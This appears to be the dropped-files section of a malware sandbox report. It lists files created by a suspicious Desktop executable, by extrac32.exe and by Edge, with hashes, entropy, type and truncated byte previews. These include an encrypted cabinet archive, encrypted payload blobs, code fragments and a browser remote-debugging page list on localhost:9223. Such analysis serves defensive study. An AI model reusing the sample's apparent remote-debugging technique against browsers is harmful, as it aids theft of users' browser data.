                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoC6ViTEC6KfNaoCqgjd3gjdHCqgjIfNaoCE0dCEHfNaoC8x0UrU0U8CG:6NnC6ViTEC6SNnCqABAFCqAUNnCfdCIB
                                                                                                                                                                                                                                                                                                                                    MD5:2B2A1DED3A5A4070EFB548B89083B0AC
                                                                                                                                                                                                                                                                                                                                    SHA1:BEC2748AAE1A94CABB1915C1E0EF61C99D021878
                                                                                                                                                                                                                                                                                                                                    SHA-256:4822CA6FDF1CABF973353851F165E14D3D4D9519EEA2E395F3C066C167F18F7A
                                                                                                                                                                                                                                                                                                                                    SHA-512:837E184637BDF10864684FD6F65E399AD3A980FFB6A3FBCF04CB667D72776809DE37D3A80E3695B2580560EE8B56902CF7E3A99F79DA156C0546BA281DEA7876
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1935CE0C9C1160250BE281A35E03211C",.. "id": "1935CE0C9C1160250BE281A35E03211C",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1935CE0C9C1160250BE281A35E03211C"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/3D438E5D2F42F9077C9D024556CAEBF9",.. "id": "3D438E5D2F42F9077C9D024556CAEBF9",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/3D438E5D2F42F9077C9D024556CAEBF9"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 489383 bytes, 12 files, at 0x2c +A "Underground" +A "Dp", ID 7503, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):489383
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.998389327797799
                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:pDSsjADpS2B3hxUoDyTEH9JtzPLKzn9zye1g/kdGGvwWK+ZE4iJ:JZ0o8AoeT+ftSJye126Rvw2hQ
                                                                                                                                                                                                                                                                                                                                    MD5:233B811FCD8464B447474B381358A65C
                                                                                                                                                                                                                                                                                                                                    SHA1:268369A6631FC5C219E50165ADB9CCAA3C2CCB33
                                                                                                                                                                                                                                                                                                                                    SHA-256:57CFAB2ECF4E58E4704CAE0A7ADCD46EE8C3045F8A74037F2BCF290210E07DED
                                                                                                                                                                                                                                                                                                                                    SHA-512:BC71CA17E79E50ECD12722B7C360CD44CEC2C46301F0A33EFF716CB09CA00FD37C115481C08C9B96D0E7044A55DBBC0CB41EA40FEC15F61E4A29116E722878AA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:MSCF.....w......,...............O...A..................Y#. .Underground............Y#. .Dp............Y#. .Cleveland..|.........Y#. .Riders......'.....Y#. .Finish............Y#. .Hotel....._......Y#. .Burns..t.._......Y#. .Rd....._P.....Y#. .Gmc..4.._......Y#. .Entities..<.._4.....Y#. .Presentation....._p.....Y#. .Univ..#..bP..CK.}`.E.0>..dI.f........A.. aA.0.h.6.l.@.N.q...`..#.8Ydh....;.NN..=..;...d...(..%|.As...4@.,.d~U=.I@}..y............m.gL.....W*#..F..xY.4.B.z>I.".~..J.Z.H./.,+[L....h..p..x.'.{.D.$..YMJ..4....q.w..g..-..-.;:..._.....D..G.."/.,.r6.+...i..S...`.....\ .h....].5.....wrf..L ...b.8.'yf...).e.....j....*&.VM.pR7...B..K.k.&.....f.Y...m...p...!Bf.d....aQ..@+$^.......e$^..%Y.&i.......J......!...0...)...CK.Z.uR>.."_..6...1I.p../._...F..O.lr..r...o*B....Y<.%.?V...U.:..Y..&Q.*.......-.$;....:1.K.H-.*-..:.!H.wd..2.J.......Y..`9..ti.S!..3.j.us^.9G.H#.s.Z.7.TD...4.cmC.v..._......N...@F.C.-U...8..I6M..u.x..{me..N.\i...?...[.I.....6....0.~M.B.Z.'...
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):80896
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.494480270001492
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:E1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDm:EZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp6
                                                                                                                                                                                                                                                                                                                                    MD5:E486E8942D4A16A45BC33FBF19083E71
                                                                                                                                                                                                                                                                                                                                    SHA1:A30BC89DCA21A95C97EC5FD54D62CFC03B80E9FD
                                                                                                                                                                                                                                                                                                                                    SHA-256:6B1D330F017CFDAED91B2B8C043E69BB1BF588B2A516E13FA34A17661118B280
                                                                                                                                                                                                                                                                                                                                    SHA-512:5E857826D16D473D50DC47EF6F564E3FFD90E804EAC4B26408720120EE85107DCD1E84E79650AC8EB1061CC9F3B1D09F0E07D4FF3AF42691F9D981CE232960F8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):68459
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997258142405833
                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:270v/Cujr6YyBnpTFAEOkjhA9QE93Jb+jYW8/3YyRv3GnIkAZ:2AQ5pTFAbsmX1YyJp
                                                                                                                                                                                                                                                                                                                                    MD5:0442C1BA281F7F9E2190C89AA020F1ED
                                                                                                                                                                                                                                                                                                                                    SHA1:575A7E100B8CA4AAF4CE03338841EF150267E2FB
                                                                                                                                                                                                                                                                                                                                    SHA-256:799C405A39EE108A032E22197345BE89B8FC7DB93D03B4CAEDCFE2F7094B7D51
                                                                                                                                                                                                                                                                                                                                    SHA-512:E373175534B7831372F2665A545428A98606EBBDFFC5C162025EEF3A6A9D975A52FB91EF0D19493C71AE404158105FE501C1A2C07EA17C1D7B732D605B8A9954
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.*..b..3+..K[......T@<\e.{...o..~...CWzl...E.qs....:..zG..D..?.CmT_..P.%$..c..72.U..;..`?d.m],......r.I..KM..H...1.....I......3..m[\.*.f.....{&?..Ps....\..0/...u......,.......(&..:.....cq5X.f.(.1...= E..'].4.4......V.^.t/...{..~.~H.y4....A...l..`s.p...=.*.m.y..5}Z..QG.... .0..u.Q..S9.....Y.).l....W.7b..c..k..Wmke.M.v...K..).........B..).s.KJ=.4.k..*...{..(W.f.......<.n..h.W`]...;.....JK.i...B.\9]59... .e^..[:..o...=.s.....A....7Hip...f.-._c.*..^N..Y.m..?.M.'.lY....6..bi.:.N..Ml.b.q....sg8....3......%...$*..../N..qSR5..X3.../.;..8l.1.*.)...F.N...u.%l$..)R$.......{{.D.....K.&j.......sbRK.84....O@..u..Q.K.......{.........Hty"...h....3.V.....z%../..'eY.Hm.}.1S=.....0.............9..I..4.MWdf.......;..(......Ii.h..E.....f...SO..........W.f'........x...6.y.1.'T.yjGT.2..E..N.l..n.L.....AT..}..G.R.)Ji...t.MW....Pk..%..\.a.p..RV.$p..e....}.A..c.....]mc...\-.z..MY.....9.wO.)]...`.x..+...[.['.$....../El..`..k^U...DL#....?....c..Jq..fZ
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):95232
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.68109263650184
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:OaSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26K:OtNPnj0nEoXnmowS2u5hVOoQ7t8T6pY
                                                                                                                                                                                                                                                                                                                                    MD5:A04B78BC86C8F116676EFADA45088228
                                                                                                                                                                                                                                                                                                                                    SHA1:76C4B011883733F1403B42ADE00E60DD15EE3C09
                                                                                                                                                                                                                                                                                                                                    SHA-256:F5DFA5B1E172855624F0E9B3CD688A57A21088E1DB300B85E96D9F2C731F6CE2
                                                                                                                                                                                                                                                                                                                                    SHA-512:717C43B1606EF9798AC4FD8328F523B5A3C13948964F8AF16B382B6C65C1C89E1E14E7E7FFE858DBCBC04BF112272635CD5890122F9BD9BF67622080821C8CDD
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.......E..E..P.E.P.M.....YY........~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}............F..4F......F.f.............f;.u...F.....f;.t....:3.....u..u..U....u..u..9........t.G..F..4F...f;.t....8.......5..F..4F...f;.t..........1L..4F..F..4F...f;.t......jw[...3.B....1L...F.......;u.............I.^.E.#.E.\.A...............F.jwYf9.F..x...
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):97280
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.148328624322622
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:dbLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8ay:dbLezW9FfTut/Dde6u640ewy4Za9coRf
                                                                                                                                                                                                                                                                                                                                    MD5:387D52EFF5C4F33030691F423DEC8C58
                                                                                                                                                                                                                                                                                                                                    SHA1:4DB923376BD355BEED848EC5A5741DB116738EFF
                                                                                                                                                                                                                                                                                                                                    SHA-256:C4B57ABA31692077CD34A0844A24DF37B32F2B51D764D8D92FADFA3898C79D99
                                                                                                                                                                                                                                                                                                                                    SHA-512:C56DFC720F14531628C766728FDEECAE8A56FC4DEB7A96D172AC2D5E198A9CF7EF2A28FAC8EBE4BB70F97A077CFE1215659F5101F7B110C82BC3018AF3F861F7
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.t..D$...P.*..........L..L$..i.....t.3..CS.O.......|......H..|9...D9.t..@8.X..O......L..L$..).....t.j.............. .L..L$........t!.E..@..p....c....v..L$...........@.L..L$........t..E..@..H......P.... .......`.L..L$.......t..E..@..p.........L$..D$.P.v..] ......z..........L..L$..i.....t..... ...7......L..L$..K.....t..E..@..H..t...P...."...&.....L..L$........t..D$(..P.. ..........L..L$........t!.E..@..p....U....v..L$..!........ .L..L$........t&.......u.3.............F.............4.L..L$.......t.j....@.L..L$..z.....t.j....!........P.L..L$..Z.....t..D$(..P.q.........p.L..L$..7.....t.j.j.h.....6..H.I....&...L..L$........t)j.j.h.....6..H.I..p....?....C......3........L..L$........t%.D$...P.............D$..C..............L..L$.......t-.E..@..p.........F..0.D$.j.h.....0..H.I........L..L$.._.....t-.E..L$(Q.@..H.....P.........t:.D$(..P..r...X...L..L$.. .....t..E..@..H..I...P...%....u,...H..|9...D9.t..@8.@......|9...D9.t..@8.@...L$.......L$(......L$8....._^3.[..]...U..V.u....i..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):66560
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997251702224176
                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:wcGxystPcx1SzZ1vcq+r0nbwEFfmw3iwiiObrv+9H0Es:wcRycx1e1vcq+Inb9faD7Vd
                                                                                                                                                                                                                                                                                                                                    MD5:4AC8DA0D7E11A8F1E33A1203D4F5ADBC
                                                                                                                                                                                                                                                                                                                                    SHA1:E1A647384E80BB07A48D6162E39620E0D3081B7A
                                                                                                                                                                                                                                                                                                                                    SHA-256:C78D8701DE6B1E347E138FF4AFB6948E95BC3B5A6012C7C44FA8508B415F8023
                                                                                                                                                                                                                                                                                                                                    SHA-512:E124850FC27DBB6A52991410D977A2BB77928F8AC387A796AAC692373D08B9EF809B409F2F8EABCBF694B06630C7A9A4CD263B36DD43DF8D8257AC5FC936FDA9
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:...2....c...XJ...V.,...7.....o....I\....O/...U...r9_..-?.xp....FY.T8.......3.q...E.j..j..Q).-qc.O.D..{k.....t.&....{,h.}.S.1..{...#tI....p...L...M......vqs..4.L34G.F..!9.6.B.(g.F. . .)z. .|..'i=._pU.<\._f<v.|V...]D.-.e #.N}..!.s...A....Jr+..F.l@.5!...[......A.<..S....Y.N...I......i..U.2.Y SM.....'.*.....n.TCg.k..vxy...t.~,..w.q..x...C.@.Nu..xP.N.H;.........7...x.`...JX4.n.O.q..q........}W.....'......cm....Xio...#.4rP.9....h)+.}...y.....4A... .*/X..zk...JI..s........A.TjI......BA.ff}.{!.;nA5+.ZD.+.Hv.4.jO....:.Q......hA.#..q......;\.&..."6.1:?....{g...u.....bx.cf...g.o.w.C...k.u.=...Z7O_$.}.] .$}.............b.1....rl......_...5.U .S.''N.....J.7......"......Y..(.-^1n....u..#..`%.....f....x....&<.=..c*f^}$"....N....%.(.\..d2H.{A.&....AKx.{..o0.+D.UGlyR%O.3f....!...?...n..w...$.U9....1..M.@.U/.^.&.9.......<...n.a..a....I..9f..=%....P.6.6.)..x..................r.<.D}Xv....\...q..k.J....e)..-../.+......Ujvrp.p;.............3....H....
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):117760
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.656645123206183
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:A0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBi:BbfSCOMVIPPL/sZ7HS3zD
                                                                                                                                                                                                                                                                                                                                    MD5:2F6E9047F479FFF7DC14B1C33E4C2897
                                                                                                                                                                                                                                                                                                                                    SHA1:2251E25F040EA6BAE8A429710D75855BD268A5E5
                                                                                                                                                                                                                                                                                                                                    SHA-256:F6989C8B659DE24E81D0FB0A18BCCB20B9D80A8B6FCE05F33AEEB574E2B0F2E0
                                                                                                                                                                                                                                                                                                                                    SHA-512:DE0B630C9789A5A057BE0D269EB68959B1AE12489028F373279A98CD20F349E8851C92745000A6FC1ED7A8458D1165704379A103AD94080C76DB580704D0118B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:..=4.M..|'.}...].S.t....u.....#u..e...Y..Y.u...U._^[..]..U..Q.P.L....u..\....P.L....u........j..M.Qj..M.QP....I...t.f.E...]..U....t.M.SV.u......S.4:..j..F...+...~...F.YYt.j@Y....^............F..F......F..F..f....^[]..U..M.3.8.t.;E.t.@.<..u.]..S..QQ......U.k..l$..........L.3.E..C.V.s.W.....|........t)...t ...t....t....t....urj...j...j...j...j._Q.F.PW.f.......uG.K....t....t....t..e.....E..F.......]..E..F.P.F.PQW..|...P.E.P.=h.......|...h....Q..m...>.YYt.."$....t.V.E$..Y..u..6..k..Y.M._3.^.;.....]..[..U..QQ.E....]..E...]..U...M.V..uG9E.u..R..........Z(........>.}..t.....9u.v..+..........3(......^].|...j..u..u..u.........^]..U.....}........SVW.u..M..I...}........t..]...t..M.;.v..............'...N.E......u.QSW...........3+......M.QP......M.....QP........C.m..t...t.;.t.+..}..t..M...P...._..^[..3...].j.h(.L.....3..u........u..)...j.^.0.2'.....g...3.9E......t.}..t..E.%...........t.3..E..E.E..u..u..u..u..u.V.E.P.c.........}..E............t.......L....u..}.}..t%..t.....
                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):66560
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.288111828790418
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:EdZPp7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjw:ELxyA3laW2UDQWf05mjw
                                                                                                                                                                                                                                                                                                                                    MD5:84F5EA070E8780661E6AA3131A3CCD43
                                                                                                                                                                                                                                                                                                                                    SHA1:6AE446BC3FD92D3480EB359A146733F0E83AA543
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F186348F9F5E6364129F36AB7DDC41D55BCD9B93D501B851382D3B538867B46
                                                                                                                                                                                                                                                                                                                                    SHA-512:5C895829B8295E543F480BD5BDDC6E3F947330878938EAEF34B24337316198C79D139EE2CFC7F2B4908777A2A3C7819646F3614BFBE5B198E1BC9F69EA1F5DF3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:L.........L.........L.....f....L.......L.|.I.....L..lG.....L.........L.........L.........L.....f....L.......L. .J.....L..mG.....L.........L.........L.........L.....f....L.......L...I.....L..nG.....L.........L.........L.........L.....f....L.......L...I.....L..nG... .L.......$.L.......(.L.......,.L.....f..0.L.....4.L.P.I...@.L.3sG...D.L.......H.L.......L.L.......P.L.....f..T.L.....X.L...I...d.L..sG...h.L.......l.L.......p.L.......t.L.....f..x.L.....|.L.<.I.....L.wxG.....L.........L.........L.........L.....f....L.......L.@.I.....L.6yG.....L.........L.........L.........L.....f....L.......L.T.J.....L..}G.....L.........L.........L.........L.....f....L.......L.X.J.....L..~G.....L.........L.........L.........L.....f....L.......L...I.....L.c.G.....L....... .L.......$.L.......(.L.....f..,.L.....0.L...J...<.L...A...@.L.......D.L.......H.L.......L.L.....f..P.L.....T.L...I...`.L..o@...d.L.......h.L.......l.L.......p.L.....f..t.L.....x.L...I.....L.{.G.....L.........L.........L.........L.....f....L..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):84992
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997654801541492
                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:Fa3JIRKrsGJg7ByP7VwJ2HE9MM79VhQCgHP/+YmXQWnT805ICQg:Fa4OHJCyP7VwJ2tMPhoOYmXvnY0SCQg
                                                                                                                                                                                                                                                                                                                                    MD5:34BB7DA2EDF7DD73EA12C1ADCD594EFF
                                                                                                                                                                                                                                                                                                                                    SHA1:2760253CDD8A880346D22217E5FF0DA3872826FA
                                                                                                                                                                                                                                                                                                                                    SHA-256:294ECE3F8DAC08641F61D1E9C3BE014C410C5F50783E27D0D4B063646CB86C5E
                                                                                                                                                                                                                                                                                                                                    SHA-512:098659D2689B68D396DAAABE64E12ED2E3068868A53CC709275409165401200A7671DA54467FE3AA4D43AD22D0A353D562A27553DC63D550310503102F11F7AC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.$..)..:.s........>..H.W..U.s;1..Y.gI:D.y..c"9...1.x......-cY.{..|.......4p..%..0a.(e.r.x.z.N.".!...h+Ywt.PJ.O*..Uw.....,...._.....?.w...w6d....O.u.?:.p.3G........@k...^..P...GP.Z.`.9.k...M.91.....C..o.-.s...[.....f.a.::..F.../.y.,["..W.O.C..[.....)...gp%\._X..xqEM.w....;E.....@...x.....]=g.....\K._Q.!.h.q0.Qr......a.-f...}....u..i..&y..E5q....h..W.e..D(....E...5.lH...u....m`..)Ad...Y>G..r...6.......-.W&.....pTRy..d....YL.y..D..+wiY*..=.Y..(..+.D.I+\k...;...r.'.hp...Z..x.s..n.x..S.`...3.'n,......H.Q...xs#u.P.mA.......:..4..=....L...@..m.....}....=/.gm...l.j....[..I..k....46...Wk[.j..w.:.Q.Q...0i Hj}Q."p).h..#....&......L.".8.....:C.....Q....)...$<._.K6A..Zo.]svRFd...Et.LK.*..:n.9..D..xc.8B.m.......gh...X3.w.E...~.iB.l........BH..d.p..O.%...r.V.b....M!9..%h..[B....R),...$m.lAu...FA......sQ...-.!...2#.....jz).p...cO.g.....P.1[...>[...r.r.$.....>.3...=(.[9EW?.=p....e..4.a..h...6*U.EL.d$.e.N.....7..d...S.QuC..._..:.......q...?...t..L.]..k..E...
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):31335
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                                                    MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                                                    SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                                                    SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                                                    SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
